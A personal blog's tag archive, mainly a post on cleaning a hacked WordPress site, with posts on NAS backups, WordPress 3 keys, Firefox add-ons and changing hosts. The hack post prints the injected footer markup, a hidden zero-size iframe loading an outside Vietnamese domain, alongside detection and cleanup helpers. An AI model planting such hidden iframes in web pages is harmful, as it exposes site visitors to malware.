Tag Archive: FTP

Hacked – I was a possible Malware Site for tructuyenso.vn!

Introduction

A few days ago I got hacked.  I quickly ripped out a heap of dodgy files left by the hackers but for some days now, Firefox, my browser, while viewing pages on this website, has been saying that it’s “downloading data from tructuyenso.vn… “.

.htaccess

This, of course, was not actually happening, as I’ve put the blockers on the whole of Vietnam using .htaccess!  The reason for this is that initially, tructuyenso wasn’t the only site appearing in the progress tip – there was another which lasted until I got rid of the various files dumped on my website.  This is how:

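# Apache 2.2-style access rules: refuse GET and POST requests arriving from 112.0.0.0/8
# <Limit> covers only the listed methods; others such as PUT or DELETE are not restricted here
<Limit GET POST>
order allow,deny
deny from 112.0.0.0/8
allow from all
</Limit>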

However, the call was still being made from somewhere on my site as the progress indicator wouldn’t stop….

Site5 Search

A search for the string “tructuyenso.vn” turned up nothing in the files on my website using my website host’s file manager.  (In the end, this was my failing and I will not rely on the thing again!)

A search through my database also turned up zero.

TCPView

TCPView is a download from Sysinternals.com  (now Microsoft!) that shows the various net connections being made to one’s PC from everywhere.  This immediately showed that as soon as the main strangelyperfect.tv website (not the backend WordPress admin area), fired up in Firefox, as many as 7 connections were simultaneously made to 112.78.15.230……  This is the IP address that holds tructuyenso.vn, plus 11 other domains, some of which I’d seen flash through the progress bar.

Even when closed by TCPView, the connections would immediately start up again to the same IP address, 112.78.15.230  (manually closing strangelyperfect.tv stopped the connections).

Reverse IP on tructuyenso.vn

YouGetSignal.com shows the domains up nicely in the screenshot above.

Result!

Finding nowt anywhere and Google searches providing zilch on the website in question except in Vietnamese, I turned to the WordPress Codex, specifically, https://codex.wordpress.org/FAQ_My_site_was_hacked

I had of course previously changed my FTP, MySQL database and site management passwords, but the link at the bottom to a Website malware & blacklist scan (Sucuri) was the killer!  On visiting Sucuri, it instantly said that I was acting as a host for malware and gave the offending results, for free! (Of course, I wasn’t hosting malware – just that it gave an indication that I was and hence the slowness of the site to load as it tried and failed to download shite my way from Vietnam)

This is their take on it: http://sucuri.net/malware/malware-entry-mwiframehd202

Final Cause and Clean Up

Checking the source code for my homepage (which in retrospect I should have done first!!) threw up “tructuyenso.vn” right at the very bottom.  This is the code as it was when I checked:

<a href="http://tructuyenso.vn" title="Quang cao truc tuyen | Ban hang truc tuyen | Dien dan quang cao truc tuyen" > Quang cao truc tuyen</a>
<iframe marginWidth="0" marginHeight="0" frameBorder="0" width="0" height="0" bottommargin="0" rightmargin="0" leftmargin="0" topmargin="0" nosize scrolling="no" src="http://tructuyenso.vn/"></iframe>
</body>
</html>

This was then easily traced to the footer.php file in my theme, Suffusion.
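An added example (not from the original post): the injected markup only showed up in the rendered page source, so this Python check parses a page's HTML and reports iframes that are both invisible and loaded from another host. `SAMPLE_PAGE` is constructed from the snippet above; `find_hidden_frames` and its `own_hosts` parameter are names chosen for this illustration.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample: the tail of a rendered page, modelled on the snippet above.
SAMPLE_PAGE = """<div id="footer">
<iframe src="/widgets/clock.html" width="200" height="50"></iframe>
<a href="http://tructuyenso.vn" title="Quang cao truc tuyen"> Quang cao truc tuyen</a>
<iframe marginWidth="0" frameBorder="0" width="0" height="0" nosize scrolling="no" src="http://tructuyenso.vn/"></iframe>
</body>
</html>"""

HIDDEN_STYLE = re.compile(r"display\s*:\s*none|visibility\s*:\s*hidden", re.I)


def _tiny(value):
    """True for a width/height of 0 or 1, with or without a 'px' suffix."""
    m = re.fullmatch(r"\s*(\d+)\s*(px)?\s*", value or "")
    return bool(m) and int(m.group(1)) <= 1


class HiddenFrameFinder(HTMLParser):
    def __init__(self, own_hosts):
        super().__init__()
        self.own_hosts = {h.lower() for h in own_hosts}
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag != "iframe":
            return
        a = {k: (v or "") for k, v in attrs}  # HTMLParser lower-cases attribute names
        host = (urlparse(a.get("src", "")).hostname or "").lower()
        external = bool(host) and host not in self.own_hosts
        hidden = (_tiny(a.get("width")) or _tiny(a.get("height"))
                  or bool(HIDDEN_STYLE.search(a.get("style", ""))))
        if external and hidden:
            line, _col = self.getpos()  # line on which the tag starts
            self.findings.append((line, host, a["src"]))


def find_hidden_frames(html, own_hosts):
    """Return (line, host, src) for each invisible iframe served from another host."""
    finder = HiddenFrameFinder(own_hosts)
    finder.feed(html)
    finder.close()
    return finder.findings


if __name__ == "__main__":
    for line, host, src in find_hidden_frames(SAMPLE_PAGE, {"strangelyperfect.tv"}):
        print(f"line {line}: hidden iframe loading {src} (host {host})")
```

Run it against the HTML the server actually sends (saved with the browser's "view source"), since that is where content injected through a theme template appears.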

It was simply stripped out and the website then worked fine…..  but to be sure, I have downloaded then checked the footer file in a fresh theme download to be sure – it’s clean!  I then uploaded a whole clean Suffusion theme in its entirety just in case any other theme files were compromised during the original hack yet were dormant, waiting for a trigger.
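The comparison against a fresh theme download, as an added example rather than the author's own procedure: it hashes every file in the installed theme and in a clean copy, then lists files that were modified, added or are missing. The directory layout and file contents in `demo()` are constructed, and `compare_theme` is a name chosen here.

```python
import hashlib
import tempfile
from pathlib import Path


def _digests(root):
    """Map each file's path (relative to root) to the SHA-256 of its contents."""
    root = Path(root)
    return {
        p.relative_to(root).as_posix(): hashlib.sha256(p.read_bytes()).hexdigest()
        for p in sorted(root.rglob("*")) if p.is_file()
    }


def compare_theme(installed_dir, clean_dir):
    """Report files that differ from, are extra to, or are absent from the clean copy."""
    installed, clean = _digests(installed_dir), _digests(clean_dir)
    return {
        "modified": sorted(f for f in installed.keys() & clean.keys()
                           if installed[f] != clean[f]),
        "added": sorted(installed.keys() - clean.keys()),
        "missing": sorted(clean.keys() - installed.keys()),
    }


def demo():
    """Constructed trees: a clean theme, and a live copy with a tampered footer
    plus one file that the clean download does not contain."""
    with tempfile.TemporaryDirectory() as tmp:
        clean, live = Path(tmp, "clean"), Path(tmp, "live")
        for root in (clean, live):
            root.mkdir()
            (root / "style.css").write_text("body { margin: 0; }\n")
            (root / "footer.php").write_text("<?php wp_footer(); ?>\n</body>\n</html>\n")
        with (live / "footer.php").open("a") as fh:
            fh.write('<iframe width="0" height="0" src="http://tructuyenso.vn/"></iframe>\n')
        (live / "images").mkdir()
        (live / "images" / "cache.php").write_text("<?php /* constructed stand-in */ ?>\n")
        return compare_theme(live, clean)


if __name__ == "__main__":
    for kind, files in demo().items():
        for name in files:
            print(f"{kind:9} {name}")
```

Content hashes are used instead of modification dates because dates can be reset by whoever changed the file.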

A recheck on Sucuri shows my website to be okay now.  See screendump below.  I’ll be using Sucuri a lot more!

Sucuri Site Check

What is the Best Backup for Windows in a Small Home or Office?

Which Windows Backup?  A History.

Over the years I’ve tried many systems for backing up crucial Windows data.  Currently for small-scale backups I use the ubiquitous and almost bullet-proof flash drives, my current one tipping the scales at 8Gb.  But for major backups, as the years have passed, I’ve used;

  1. Floppy discs – 1.4Mb
  2. Iomega Zip discs – 100Mb
  3. CDRW – 650Mb
  4. DVD-R – 4.7Gb
  5. Western Digital My Book Home Edition – 1Tb

They all had their problems and limitations.  The last one looked good with Firewire, USB2, ethernet  & eSATA connections – but it overheated and broke…..

Best Windows Backup!

My current system is from Synology and is a “DS210j – Budget-friendly 2-bay NAS server for Home and Small Business”

See: http://www.synology.com/enu/products/DS210j/index.php

I can heartily recommend the thing.  It has so much gubbins within it and far exceeds my limited expectations.  I installed two green 2Tb drives from Western Digital  in mirrored RAID for security and use the auto-backup software provided as well as Windows’ own.  This is extremely relevant for the large number of hits I’ve had to this posting where a major part of the problem is the time taken to do a backup!  In my case, the 750Gb just takes a few hours to copy across the Gigabit speed ethernet that the unit can use.

Addendum June 2011: The tool is a seriously capable bit of kit and I cannot recommend it enough. Get one!

It does everything it says on the tin, and more!  The whole thing cost me about 200 quid, plus an hour of my time to install.

Even its firewall is more configurable than any router I’ve used!  It can be used as a server for FTP or the web.  It comes with software for a host of things that mimic Flickr etc but without all the privacy or security issues inherent in off-line storage.  It’ll also run with any operating system because it itself is a mini-linux installation as it is, and includes Windows, Apple and Linux applications.
Check it out, straight from their overview page:

Build Your Entertainment Center

Download Station 2 functions as a 24×7 BitTorrent, FTP, HTTP, eMule, and NZB download center. RapidShare and RSS download are now supported.

DLNA Compliant Media Server ensures compatibility and interoperability between Disk Station and a wide range of DLNA-certified home devices.

iTunes Server provides an easy way to share music and videos with other iTunes clients within the local network. You can create playlists with songs that match the criteria you specified, and best of all, iTunes will update these playlists automatically as you add or delete songs.

Audio Station supports music, Internet radio stations, and iPod playback with connected USB speakers. Web-streaming mode allows your music to be shared with multiple users over the Internet.

Back Up Your Precious Data

DSM 2.2 offers comprehensive solutions for you to back up data stored on Disk Station or your desktop computer to the Disk Station.

Server backup includes two alternatives: Network Backup and Local Backup. Both allow you to back up data in the shared folders and databases. Incremental backup option and flexible schedules are available. All can be easily configured with a step-by-step wizard.

Desktop backup provides Windows PC users with the Synology Data Replicator 3 for backing up desktop data, Outlook, and Outlook Express emails to their Disk Station by choosing one of the three backup modes: Immediate, Sync, and Scheduled backup, while Mac OS X users can use Apple Time Machine backup application to back up their critical data to Disk Station.

USBCopy allows you to quickly back up your data from a USB storage device such as a USB flash or USB card reader to the Disk Station with just one single touch on the front-panel Copy button.

Enrich Your Web Presence

Photo Station 3 simplifies photo, video, and blog sharing over the Internet. The flexibility of photo theme customization, blog layout arrangement, visitor’s privilege setting, RSS feed, and the dazzling 3-dimensional photo browsing with Cooliris make Photo Station 3 your state-of-the-art lifestyle sharing center on the Internet.

Web Station with built-in PHP+MySQL allows users to publish their own websites or install numerous popular open-source programs.

Access With Your iPhone/Mobile Device

The iPhone App DS audio allows Disk Station users to stream music stored on Disk Station with their iPhone/iPod® touch where Internet access is available, while DS photo allows uploading photos from the iPhone/iPod® touch to their Disk Station.

Users with a mobile device running on Windows Mobile® 6.0, iPhone OS 2.2.1 onward, or Symbian OS 9.1 can log on their Disk Station to view photos with Mobile Photo Station and read supported file formats with Mobile File Station where Internet access is available.

Eco Friendly

Synology Disk Station is designed and developed perpetually with the concept of energy saving. Compared with average PC counterparts, Synology Disk Station consumes a relatively low amount of power and has the HDDs hibernate when not in use. This not only helps to save energy but also extends the lifespan of the hard disk.

Synology Disk Station truly earns the title of “green product” because of the unique Scheduled Power On/Off feature, and the smart fan design effectively cools down the system with minimum power consumption, yet keeps the system quiet on operation.

Finally, all Synology products are produced with RoHS compliant parts and packed with recyclable packing materials. Synology recognizes its responsibility as a global citizen and is continually working to reduce the environmental impact of the products we create.

WordPress Now at 3 Point Oh!

Strangely post on June 18th, 2010
Posted in Internet

WordPress Upgraded

Following the internal  prompts, I’ve now upgraded all my WordPress installations to version 3.

Only one site didn’t want to ‘take’ using the upgrade button so I had to do it the old FTP upload method.  For all of them, after checking wp-config.php I’ve discovered that a whole new raft of security passwords have been implemented.  These needed generating and pasting into each wp-config file.

These are handily available here, https://api.wordpress.org/secret-key/1.1/salt/ and refreshing the page generates a new set of codes to paste into each website (we don’t want the same one now, do we? !!)  This is a sample output:

define('AUTH_KEY',         '{p5hDGT(#P8<h^*7)a_[83Z{bg3BW8zx,+DF-^b[j#=B5s]LDa3 Oj`_Z;s}$j)&');
define('SECURE_AUTH_KEY',  '? rNH,,8|v+{+tT1)#PQ@~_04}gSq1G/,||QbCIz-6le0JF})_mAOjj7}j!rkX*%');
define('LOGGED_IN_KEY',    'bJy+b}XgZhz&?DBJPCtjiC)S3w+y&9WIeR-LU{$O/Pm$g_z*]I|4D7ciK94IrEr0');
define('NONCE_KEY',        '8KK7=E~83:g:r,obk R98{JOm6juB^b,Q/$2Q?~&#]gidTxJD;}JB;|?ydn(:iR$');
define('AUTH_SALT',        'VpR<E<[email protected]%_cHTf+#esj^R8*$pQ}I?&6,w!I`Jxrz?=BQA$j|(C95)');
define('SECURE_AUTH_SALT', 'e=k{+sqg@/4e-~fRV:@jH9lHqfy^M7HvVkp=MeRc)uQOT e#$K2)!8G7urN[STm>');
define('LOGGED_IN_SALT',   'vx<n#NJqb&[email protected]; -DWQ)pDy#137z3ga#q4$odysCbnRlnp_N,c_seMZ9pP|');
define('NONCE_SALT',       '1+uBKH,=0tEP$p)0Cfdr*tQ|<|l1dN@tHtZo->GeQIj*]Xt9Moc XuJG7`>?.~dG');
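An added example, not part of the original post or of WordPress itself: a Python check that reads the text of a wp-config.php and reports any of the eight constants that is missing, still set to the sample file's placeholder, shorter than 64 characters, or sharing a value with another constant. `SAMPLE_CONFIG` is constructed, and the 64-character minimum assumes values taken from the generator linked above.

```python
import hashlib
import re

REQUIRED = ["AUTH_KEY", "SECURE_AUTH_KEY", "LOGGED_IN_KEY", "NONCE_KEY",
            "AUTH_SALT", "SECURE_AUTH_SALT", "LOGGED_IN_SALT", "NONCE_SALT"]
PLACEHOLDER = "put your unique phrase here"  # default text in wp-config-sample.php
MIN_LENGTH = 64  # assumption: length of the values the linked generator returns

# Matches define('NAME', 'value'); with single-quoted arguments, as in the sample output.
DEFINE = re.compile(r"define\(\s*'(\w+)'\s*,\s*'([^']*)'\s*\)\s*;")


def audit_keys(config_text):
    """Return {constant: problem} for every required constant that fails a check."""
    found = dict(DEFINE.findall(config_text))
    problems, seen = {}, {}
    for name in REQUIRED:
        value = found.get(name)
        if value is None:
            problems[name] = "missing"
        elif value == PLACEHOLDER:
            problems[name] = "placeholder"
        elif len(value) < MIN_LENGTH:
            problems[name] = f"too short ({len(value)} chars)"
        elif value in seen:
            problems[name] = f"same value as {seen[value]}"
        else:
            seen[value] = name
    return problems


def _fake(label):
    """Constructed 64-character stand-in for a generated value (not a real secret)."""
    return hashlib.sha256(label.encode()).hexdigest()


# Constructed wp-config.php fragment with one of each problem.
SAMPLE_CONFIG = f"""<?php
define('DB_NAME', 'wordpress');
define('AUTH_KEY',         '{_fake('a')}');
define('SECURE_AUTH_KEY',  '{_fake('b')}');
define('LOGGED_IN_KEY',    'put your unique phrase here');
define('NONCE_KEY',        '{_fake('a')}');
define('AUTH_SALT',        'changeme');
define('SECURE_AUTH_SALT', '{_fake('c')}');
define('LOGGED_IN_SALT',   '{_fake('d')}');
"""

if __name__ == "__main__":
    for name, problem in audit_keys(SAMPLE_CONFIG).items():
        print(f"{name}: {problem}")
```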

Things to Do

If you checked out the video you’ll have seen a heap of new things.

The big things for me are,

  • the custom menu structure
  • the easy potential for one WordPress installation to manage all my sites – millions as they say!

The advantage of the latter is a much simpler upgrade path for WordPress – i.e. one instead of many, with all that that entails.

So things to do are;

  • Make a multi-website WordPress system
  • Redo all themes as the current crop do not support the custom menu structure

…er…  that’s it for now.

Five Fabulous Firefox Add-ons

Firefox Add-ons: What is an Add-on?

First things first.  It’s now well known among the more savvy internet users, that the Firefox web browser is a fine piece of kit; secure, innovative and with a burgeoning user base that has seen Microsoft rise from its slumbers and put some serious damage control development into its venerable Internet Explorer.

But part of the reason for the rise of Firefox is its ease of installing small lumps of code by the user – called Add-ons.  These can do many things – weather, stocks, pictures, FTP clients…..  there are thousands now.  Visit the add-ons page and they are grouped into various categories.

Add-ons are made by a host of mainly unpaid software designers.  The code is generally open source so that anyone can modify it for their own needs.  The reality for me is that I use something if it works, and ditch it if it doesn’t!  I haven’t the spare time for code work…

So What to Choose?

Now there’s the rub!  The best thing is to install some that fall into your area of interest, have a play, remove them and try some more!  You’ll soon find out which have the features you want, are fast, and don’t crash your browser!

To install, just click on the add-on link, wait a couple of seconds for the countdown timer and then install.  Usually that’s all there is to it.

For myself, I’m not that interested in the many ‘consumer’ type add-ons (like music listings and Facebook notifiers etc) , but I’m interested in things that improve my coding and browsing life, or help me produce articles like this one!

My Recommendations


British English Dictionary – link

Firefox Dictionary Check

Used when blogging or commenting to correct spelling!  That’s a screen-dump above of it working.

Words can also be added – and it’s all on the right-click!


Screengrab – link

Screengrab Menu

The best ‘printscreen’ utility I’ve come across.  Use it to get screen captures of dodgy websites before they are closed down!

I have it set for an icon in the lower right corner of a window, then the two menus shoot out sideways.

As with the dictionary, the menus are on the right-click as well.


SearchStatus – link

SearchStatus menu

I have the info strung out at the bottom right of my window again.  The maker’s description says most of it (copied verbatim below), but it doesn’t say how useful and fast some of these features are!

Display the Google PageRank, Alexa rank, Compete ranking and SEOmoz Linkscape mozRank anywhere in your browser, along with fast keyword density analyser, keyword/nofollow highlighting, backward/related links, Alexa info and more

In essence, for me, it’s a neat, quick and configurable WHOIS lookup for any domain you’re visiting plus a wodge of bells and whistles.


TinEye Reverse Image Search – link

TinEye Menu

Another right-click menu system!  The add-on looks for images that have been found in its web trawling that match the image you right-click selected.

7 results – TinEye

This works even when the image has been edited, cut, cropped, renamed or resized!

This is the menu applied to a picture from the Crawling Chaos ‘The Gas Chair’ page.  After a few seconds, the TinEye website fires up in a new tab with a list of pages that include the picture.  Its catalogue isn’t complete but it’s getting bigger all the time…


Web Developer – link

Web Developer Menu

The enormity of the menu systems and the features it includes mean that there’s no way I could do justice to it in this small piece.  As a small example, let’s see it show all the web colours on the same Crawling Chaos page  above….

Color-Information-http-crawlingchaos.co.uk etc

Again, all features are available as a right-click, but also as a tool-bar menu if desired.

If I now check the ‘View Color Information’ entry, after a second or so, another tab fires up in Firefox and displays all the web-page colours defined in code using the colour code RGB hash style.

You can get all sorts of information about a web page and its images.

One neat thing I use all the time is the “Resize” feature which means I can set the browser to various pixel dimensions to see how web pages look at these different sizes!

But really, check out the menus for yourself.  There’s just TOO much to list!


#6 Add-on: Firebug – link

Not quite top 5 for me, but Firebug offers a wealth of coding opportunities and allows you to see the code that generates the various on-screen elements, and also allows real-time editing to see what changes would do to a page – but without opening the page up in an editor locally, or otherwise. It’s all on-the-fly.  I don’t always have it installed as sometimes their codebase doesn’t work properly when Firefox upgrades….

IE8 has a similar inbuilt feature now – perhaps Microsoft are trying hard with the developer community and can see that this is a good way to regain the initiative?


It’s Time to Move

Introduction

  • So it’s time to move…
  • It’s time to get down with it…
  • It’s time to testify..
  • …and I want to know…
  • ARE YOU READY TO TESTIFY?
  • Brothers and sisters…
  • I give you..
  • A testimonial…
  • The MC5!

With a vague resemblance to my personal life and status, and a bit like “technology mirroring life”, this domain will shortly be getting legs and pushing off to a new webhost.

I’ve become increasingly frustrated at the continuing dropouts and waits from my current host, ixWebhosting.  They were okay when I first started on this yabberring into space life, but now, in a typical pitmatic Northumberland phrase, it’s become:

Hard to Bear

This phrase closely mirrors my personal status – initial relationship, bright hopes for the future, increasing frustration, hard to bear – but I’ll leave it at that.

Webhosting

Funnily enough, while checking through the many hosting companies, one in particular made me quake somewhat.  This one is BlueHost.  It looked okay until I saw the address as:

Bluehost Inc.
1958 South 950 East
Provo, UT 84606

Now they may be all fine and dandy, but I’ve seen some pretty dodgy shit hanging around UTAH over the last three months.  It’s not all fresh air and snowy mountains by a long chalk  I can tell you,  after my numerous investigations into Google Treasure Chest and other related scams…  So they are out!

Search Problems

Finding a new web hosting service is a bit like Russian Roulette, actually.  It’s almost as bad as the Google scammers as virtually all reviews are loaded and/or fictional.  Honest truth is very hard to find.  The only way to tell is to jump in and test the boiling snake oil!

So what I have done, is to check hosts from sites that I “trust” and use, making a mental check of any downtimes I’ve come across and noting the general speed of these sites, as that’s important.  (I know my site is overloaded with crap, but hey – I hate chucking stuff out!)

So I’ve plumped for Site5.   Only time will tell if I’ve made the right choice.  Its servers are in Texas but it’s registered in Colorado – yeeHaH

I’ve got a while to play with stuff.  The backend user interface is totally different to the current setup so it’s another learning experience for me.  The only bit the same is phpMyAdmin, although they use a newer version with a claimed 50Meg upload size for database imports!

Then it’s a question of copying files, setting FTP, setting emails, setting up databases, installing WordPress, re-jigging wp-config for better security and finally, changing the DNS pointers etc at my domain name registrar.  Maybe I’ll move all images to another domain for faster page loading…?

So I won’t be posting much while I’m doing this, and hopefully, with a nice bit of luck on top of my planning, the site won’t be down for too long while waiting for domain propagation….  Watch this space!

© 2007-2017 Strangely Perfect All Rights Reserved -- Copyright notice by me